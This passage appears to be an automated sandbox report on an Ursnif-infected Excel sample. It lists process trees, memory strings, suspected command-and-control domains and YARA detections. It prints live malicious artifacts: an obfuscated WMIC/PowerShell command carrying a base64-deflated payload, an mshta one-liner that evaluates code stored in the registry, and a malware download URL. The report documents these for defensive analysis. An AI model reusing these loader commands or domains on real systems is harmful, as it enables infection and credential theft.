0CA1AQLAIDAxAQLAIDA5AAMAEDA3AgMAQDAwAAMA0CAyAAOAIDA4AwMAUDAyAQOAEDA2AQLAIDA4AwMAIDA5AwNAMDAz
Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	Binary or memory string: MBAAAEAFCAAAAAAAADAAAAAAAY0gAAQBRAAAAAooLB4aPMdAgg4AGu2DTHAIIOghr9w0BAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAkXAUAwHQB+TQDi66kGEiiNCAsCMw0ZGA8yQ6wFAAAAAAAAAAAAAAAAAAAAAAAAA0BQMAAAAAAwBLN2XRAQVzVmczBAYAgAAEAw7+6uOjSxBLN2XqAAAAoVAAAAAAEAAAAAAAAAAAAgNAAAAAAQVAMHAlBgcAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAwMAAAAUAgYAEDAAAAAAcwSLbFEAgURSJkQM5XMAAgSAgAAEAw7+ewSFb1BLtsVqAAAA8CAAAAAAYAAAAAAAAAAAAAAAAAAAAASAUGAyBgYAACACBAbAEGAjBwaAIGA1BgcA4GAAAAGAQHAxAAAAAAAHs0yWFBANV3cpNGAgBACAQAAv77BLZsVHs0yWpCAAAweBAAAAAgAAAAAAAAAAAAA2AAAAAAANBQdAMHApBwYAAAAABwcAgGAlBAbAwGAzAgMA4CAkBAbAwGAsAQLAIDAxAwNAkDAwAAAAQBAAAwdAAAAcAAAAMAAAAAHAAAAtAAAAgDAAAgYAAAARAAAAMAAAAwsghINQAAAAAwQ6wVVzVmczxFAAoCAAAgAAAAAUAAAAAAAAAAAAIAAcxFSFJlQCxUQDtkQVJlTcV1clJ3cAgUZyJGICxWYjtmY1Jnbc1Udzl2YAABAAAQBAAAoNAAAAcXAAAAHAAAALAAAgGX1YvUGtNNS+epQiACCOM0dBAAAVCAAAkAAAAaiAAAAxMFUTJuiYZEvMhzQ7y/ETaCmt5cbAAAAEAAAAAwHAAAAuAAAAMFAtAQMA0CA1AQLAIDAxAQLAIDA5AAMAEDA3AgMAQDAwAAMA0CAyAAOAIDA4AwMAUDAyAQOAEDA2AQLAIDA4AwMAIDA5AwNAMDAzAAOAUDAtAQMAADAwAQMAAAAAAAAAAAAAAAYA
Source: explorer.exe, 0000001E.00000000.2610098055.03A39000.00000004.00000001.sdmp	Binary or memory string: MBAAAEAFCAAAAAAAADAAAAAAAY0gAAQBRAAAAYusWo/KEocA+ldcX8DBKHgfZH3F/QgyBAAEAAAAAAAABAAAAAAAAAAAAAAAAAAAAsZAUAwHQB+TQDi66kGEiiNCAsCMw0ZGA8yQ6wFAAAAAAAAAAAAAAAAAAAAAAAAA0BQMAAAAAAwBLN2XRAQVzVmczBAYAgAAEAw7+6uOjSxBLN2XqAAAAoVAAAAAAEAAAAAAAAAAAAgNAAAAAAQVAMHAlBgcAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAwMAAAAUAAeAEDAAAAAAwoPSMREAAVdixWajBAAiBACAQAAv7r76MKFM6jEToCAAAA7BAAAAAQAAAAAAAAAAAAA4AAAAAAAQBQdAIGAsBQaAMGAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAgNAAAAWAAgAEDAAAAAA4uO8aSEAQ0TDVVTF5XMAAAaAgAAEAw7+6uOjSh76wrJqAAAA4eAAAAAAEAAAAAAAAAAAAgPAAAAAAARA8GAjBQdA0GAlBgbAQHAzBAAAAEAzBAaAUGAsBAbAMDAyAgLAQGAsBAbAwCAtAgMAEDA4AAMAEDAAAAGAAAAzBAAAwBAAAwAAAAAcAAAA0CAAAAOAAAAiBAAAEBAAAwAAAAAzCGi0ABAAAAADpDXVNXZyNHXAAgKAAAACAAAAQBAAAAAAAAAAAgAAwFXIVkUCJETBN0SCVlUOxVVzVmczBAU1JGbpNGXE92Y11WZuR3cAABAAAQBAAAouAAAAkZAAAAHAAAALAAAg+KJI1O5cjaRBKO/5VGC2QTmBAAAVCAAAkAAAAaiAAAAxMFUTJuiYZEvMhzQ7y/ETaCmt5cbAAAAEAAAAAwHAAAAuAAAAMFAtAQMA0CA1AQLAIDAxAQLAIDA5AAMAEDA3AgMAQDAwAAMA0CAyAAOAIDA4AwMAUDAyAQOAEDA2AQLAIDA4AwMAIDA5AwNA
Source: explorer.exe, 0000001E.00000000.2597859582.003DA000.00000004.00000020.sdmp	Binary or memory string: MBAAAEAFCAAAAAAAADAAAAAAAY0gAAQBRAAAAAooLB4aPMdAgg4AGu2DTHAIIOghr9w0BAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAkXAUAwHQB+TQDi66kGEiiNCAsCMw0ZGA8yQ6wFAAAAAAAAAAAAAAAAAAAAAAAAA0BQMAAAAAAwBLN2XRAQVzVmczBAYAgAAEAw7+6uOjSxBLN2XqAAAAoVAAAAAAEAAAAAAAAAAAAgNAAAAAAQVAMHAlBgcAMHAAAAQAMHAoBQZAwGAsBwMAIDAuAAZAwGAsBALA0CAyAQMAgDAxAwMAAAAUAgYAEDAAAAAAcwSLbFEAgURSJkQM5XMAAgSAgAAEAw7+ewSFb1BLtsVqAAAA8CAAAAAAYAAAAAAAAAAAAAAAAAAAAASAUGAyBgYAACACBAbAEGAjBwaAIGA1BgcA4GAAAAGAQHAxAAAAAAAHs0yWFBANV3cpNGAgBACAQAAv77BLZsVHs0yWpCAAAweBAAAAAgAAAAAAAAAAAAA2AAAAAAANBQdAMHApBwYAAAAABwcAgGAlBAbAwGAzAgMA4CAkBAbAwGAsAQLAIDAxAwNAkDAwAAAAQBAAAwdAAAAcAAAAMAAAAAHAAAAtAAAAgDAAAgYAAAARAAAAMAAAAwsghINQAAAAAwQ6wVVzVmczxFAAoCAAAgAAAAAUAAAAAAAAAAAAIAAcxFSFJlQCxUQDtkQVJlTcV1clJ3cAgUZyJGICxWYjtmY1Jnbc1Udzl2YAABAAAQBAAAoNAAAAcXAAAAHAAAALAAAgGX1YvUGtNNS+epQiACCOM0dBAAAVCAAAkAAAAaiAAAAxMFUTJuiYZEvMhzQ7y/ETaCmt5cbAAAAEAAAAAwHAAAAuAAAAMFAtAQMA0CA1AQLAIDAxAQLAIDA5AAMAEDA3AgMAQDAwAAMA0CAyAAOAIDA4AwMAUDAyAQOAEDA2AQLAIDA4AwMAIDA5AwNAMDAzAAOAUDAtAQMAADAwAQMAAAAAAAAAAAAAAAYA
Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	Binary or memory string: AAAAoVmciJ

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\v0kgxdqm.0.cs

Jump to dropped file

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAe
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\\DtshsPub'));if(!window.flag)close()</script>'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y	Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: explorer.exe, 0000001E.00000000.2598531439.00780000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000000.2598531439.00780000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000000.2598531439.00780000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000000.2597732664.003AD000.00000004.00000020.sdmp	Binary or memory string: Progmanp-

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_00455568 cpuid

8_2_00455568

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Contains functionality to query local / system time

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_00452D6B GetSystemTimeAsFileTime,HeapFree,

8_2_00452D6B

Contains functionality to query the account / user name

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_00455568 GetUserNameW,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,HeapFree,

8_2_00455568

Contains functionality to query windows version

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_00455D33 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

8_2_00455D33

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
17:30:10	API Interceptor	6x Sleep call for process: WMIC.exe modified
17:30:11	API Interceptor	1587x Sleep call for process: powershell.exe modified
17:30:12	API Interceptor	216x Sleep call for process: PING.EXE modified
17:31:28	API Interceptor	1071x Sleep call for process: rundll32.exe modified
17:32:27	API Interceptor	1x Sleep call for process: iexplore.exe modified
17:32:42	API Interceptor	93x Sleep call for process: explorer.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MIL0001742828.xls	17%	Virustotal		Browse
MIL0001742828.xls	10%	Metadefender		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
laddloanalao.xyz	1%	Virustotal	Browse
makretplaise.xyz	0%	Virustotal	Browse
sutsyiekha.casa	0%	Virustotal	Browse
udatapost.red	0%	Virustotal	Browse
marvellstudio.online	0%	Virustotal	Browse
abrakam.site	0%	Virustotal	Browse
sdkscontrol.pw	0%	Virustotal	Browse
hiteronak.icu	0%	Virustotal	Browse
ublaznze.online	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.mercadolivre.com.br/	0%	Virustotal		Browse
http://www.mercadolivre.com.br/	0%	Avira URL Cloud	safe
http://www.merlin.com.pl/favicon.ico	0%	Virustotal		Browse
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	Virustotal		Browse
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	Virustotal		Browse
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	Virustotal		Browse
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	Virustotal		Browse
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	Virustotal		Browse
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	Virustotal		Browse
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	Virustotal		Browse
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Virustotal		Browse
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	Virustotal		Browse
http://www.abril.com.br/favicon.ico	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	Virustotal		Browse
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Virustotal		Browse
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	Virustotal		Browse
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	Virustotal		Browse
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	Virustotal		Browse
http://busca.buscape.com.br/favicon.ico	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	Virustotal		Browse
http://www.pchome.com.tw/favicon.ico	0%	Avira URL Cloud	safe
http://browse.guardian.co.uk/favicon.ico	0%	Virustotal		Browse
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	Virustotal		Browse
http://google.pchome.com.tw/	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Virustotal		Browse
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	Virustotal		Browse
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	Virustotal		Browse
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	Virustotal		Browse
http://searchresults.news.com.au/	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	Virustotal		Browse
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	Virustotal		Browse
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	Virustotal		Browse
http://buscador.terra.es/	0%	Avira URL Cloud	safe
http://search.orange.co.uk/favicon.ico	0%	Virustotal		Browse
http://search.orange.co.uk/favicon.ico	0%	Avira URL Cloud	safe
http://www.iask.com/	0%	Virustotal		Browse
http://www.iask.com/	0%	Avira URL Cloud	safe
http://cgi.search.biglobe.ne.jp/	0%	Virustotal		Browse
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://laddloanalao.xyz/images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoM	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	Virustotal		Browse
http://search.ipop.co.kr/favicon.ico	0%	Avira URL Cloud	safe
http://p.zhongsou.com/favicon.ico	0%	Virustotal		Browse
http://p.zhongsou.com/favicon.ico	0%	Avira URL Cloud	safe
http://service2.bfast.com/	0%	Virustotal		Browse
http://service2.bfast.com/	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	Virustotal		Browse
http://www.news.com.au/favicon.ico	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.2070939440.000CF000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x11f54:$s1: poWersHEll 0x141ec:$s1: poWersHEll 0x16484:$s1: poWersHEll
00000002.00000003.2072821354.000DC000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x4f54:$s1: poWersHEll 0x71ec:$s1: poWersHEll 0x9484:$s1: poWersHEll
0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.2073703270.00070000.00000004.00000020.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1896:$s1: poWersHEll 0x418c:$s1: poWersHEll
00000002.00000002.2073869879.00270000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x25e2:$s1: poWersHEll
00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.2073914205.011BD000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1c68:$s1: poWersHEll 0x4338:$s1: poWersHEll 0x6608:$s1: poWersHEll 0xab28:$s1: poWersHEll 0xfdde:$s1: poWersHEll
00000002.00000002.2073902999.004B0000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x14af:$s1: poWersHEll
00000002.00000002.2073755839.000DD000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x3f54:$s1: poWersHEll
00000002.00000003.2072909615.014E2000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x51f3:$s1: poWersHEll
